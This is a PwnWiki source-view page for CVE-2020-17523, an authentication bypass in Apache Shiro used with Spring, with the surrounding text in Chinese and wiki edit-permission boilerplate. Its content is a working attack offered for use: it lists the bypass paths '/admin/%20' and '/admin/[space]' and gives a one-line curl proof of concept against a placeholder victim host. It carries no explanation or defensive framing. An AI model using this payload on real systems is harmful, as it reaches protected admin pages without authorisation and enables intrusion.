View source for CVE-2020-17523 Apache Shiro pathMatches 身份認證繞過漏洞

From PwnWiki

← CVE-2020-17523 Apache Shiro pathMatches 身份認證繞過漏洞

You do not have permission to edit this page, for the following reasons:

The action you have requested is limited to users in the group: Users.
You must confirm your email address before editing pages. Please set and validate your email address through your user preferences.

You can view and copy the source of this page.

<languages  />

<translate>
==條件==
</translate>
<pre>
Shiro with Spring


/admin/[space]
/admin/%20
</pre>

==POC==
<pre>
curl -v http://[Vimtim]/admin/%20/
</pre>

Return to CVE-2020-17523 Apache Shiro pathMatches 身份認證繞過漏洞.

Retrieved from "https://pwnwiki.com/index.php?title=CVE-2020-17523_Apache_Shiro_pathMatches_身份認證繞過漏洞"